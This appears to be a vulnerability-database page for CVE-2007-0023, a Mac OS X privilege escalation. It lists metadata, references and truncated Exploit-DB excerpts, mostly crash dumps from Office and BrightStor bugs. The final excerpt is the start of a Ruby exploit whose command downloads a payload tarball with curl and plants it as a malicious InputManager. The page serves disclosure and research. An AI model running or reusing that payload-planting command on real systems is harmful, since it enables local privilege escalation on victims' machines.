CVE-2007-0023
Published 2007-01-24
Priority P425 · medium · CVSS 2.0: 6.9 (AV:L/AC:M/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS: 1.54% (71.7th percentile)
The CFUserNotificationSendRequest function in UserNotificationCenter.app in Apple Mac OS X 10.4.8, when used in combination with diskutil, allows local users to gain privileges via a malicious InputManager in Library/InputManagers in a user's home directory, which is executed when Cocoa applications attempt to notify the user.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
No detection rules found.
Exploit-DB
exploitdb·2015-08-25
CVE-2015-0064 Microsoft Office 2007 - Malformed Document Stack Buffer Overflow
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=170&can=1
The following access violation was observed in Microsoft Office 2007
(Word document):
```
(e24.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0583a748 ebx=00eb4684 ecx=003ad1a3 edx=00000000 esi=049860bc edi=00122238
eip=7814500a esp=001221e0 ebp=001221e8 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
MSVCR80!memcpy+0x5a:
7814500a f3a5 rep movsd ds:049860bc=???????? es:00122238=3348bcd8
0:000> k
ChildEBP RetAddr
001221e8 31249c0e MSVCR80!memcpy+0x5a
00122204 3126a371 wwlib!
```
Exploit-DB
exploitdb·2015-08-25
CVE-2015-0065 Microsoft Office 2007 - OneTableDocumentStream Invalid Object
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=171&can=1
The following access violation was observed in Microsoft Office 2007
(Word document):
```
(8c0.e68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012dcf8 ebx=40000000 ecx=40000000 edx=0012de1c esi=40000000 edi=011f1400
eip=32881800 esp=0012d010 ebp=0012d038 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mso!Ordinal7799+0x2fc:
32881800 0fb74614 movzx eax,word ptr [esi+0x14] ds:0023:40000014=????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following
```
Exploit-DB
exploitdb·2013-07-01
CVE-2014-2671 Microsoft PowerPoint 2007 - Crash (PoC)
---
# Title : Microsoft Office PowerPoint 2007 Crash PoC
# Date: 2013-01-12
# Software Link: http://office.microsoft.com/
# Author: Asesino04
# Tested on: Windows XP SP2
# Special Thanks To : Ness Oum El Bouaghi
# Bug Description:
When you insert a sound into Microsoft Office PowerPoint 2007, the software crashes.
It was tested on Office 2007; all the versions may be affected too.
# Credit: This bug was found by Asesino04 "The Black Devils"
# Proof Of Concept
https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-prn1/601368_541967942509686_881180451_n.jpg
```
EAX FFFFFFFF
ECX 00000000
EDX 00000000
EBX 0003DAD8
ESP 0013BC5C
EBP 0013BCF0
ESI FFFFFFFF
EDI 00199FF2
EIP 0460E650 quartz.0460E650
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(
```
Exploit-DB
exploitdb·2007-02-01
CVE-2007-0816 CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service
---
```ruby
#!/usr/bin/ruby
#
# Computer Associates (CA) Brightstor Backup Remote Procedure Call Server DoS (catirpc.dll)
#
# Catirpc.exe - Provides the endpoint mapper and enables RPC services for BrightStor Backup products.
#
# (7c.350): Access violation - code c0000005 (!!! second chance !!!)
# eax=007ef924 ebx=2e009560 ecx=00325ad8 edx=007ef900 esi=00000000 edi=00324308
# eip=2e00eda8 esp=007ef8b8 ebp=2e00be00 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
# *** WARNING: Unable to verify checksum for C:\Program Files\CA\BrightStor ARCserve
# Backup\CATIRPC.dll
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program
# Files\CA\BrightStor A
```
Exploit-DB
exploitdb·2007-01-23
CVE-2007-0023 Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Local Privilege Escalation
---
```ruby
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre
# Lance M. Havok
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#
require 'fileutils'
bugselected = (ARGV[0] || 0).to_i
# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
# keeping a local backup. /str0ke
INPUTMANAGER_URL = "https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3181.tar.gz"
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
                     "mkdir -p ~/Library/InputManagers/;" +
                     "cd ~/Library/InputManagers/;" +
                     "tar -zxvf /tmp/moab_im.tar.gz"
case bugselected
when 0
target_url = "http://projects.info-pull.com/
```
No writeups or analysis indexed.
References:
http://docs.info.apple.com/article.html?artnum=305102
http://lists.apple.com/archives/Security-announce/2007/Feb/msg00000.html
http://projects.info-pull.com/moab/MOAB-22-01-2007.html
http://secunia.com/advisories/23846
http://secunia.com/advisories/24198
http://securitytracker.com/id?1017542
http://www.kb.cert.org/vuls/id/315856
http://www.osvdb.org/32695
http://www.securityfocus.com/bid/22188
http://www.us-cert.gov/cas/techalerts/TA07-047A.html
http://www.vupen.com/english/advisories/2007/0074
https://exchange.xforce.ibmcloud.com/vulnerabilities/31676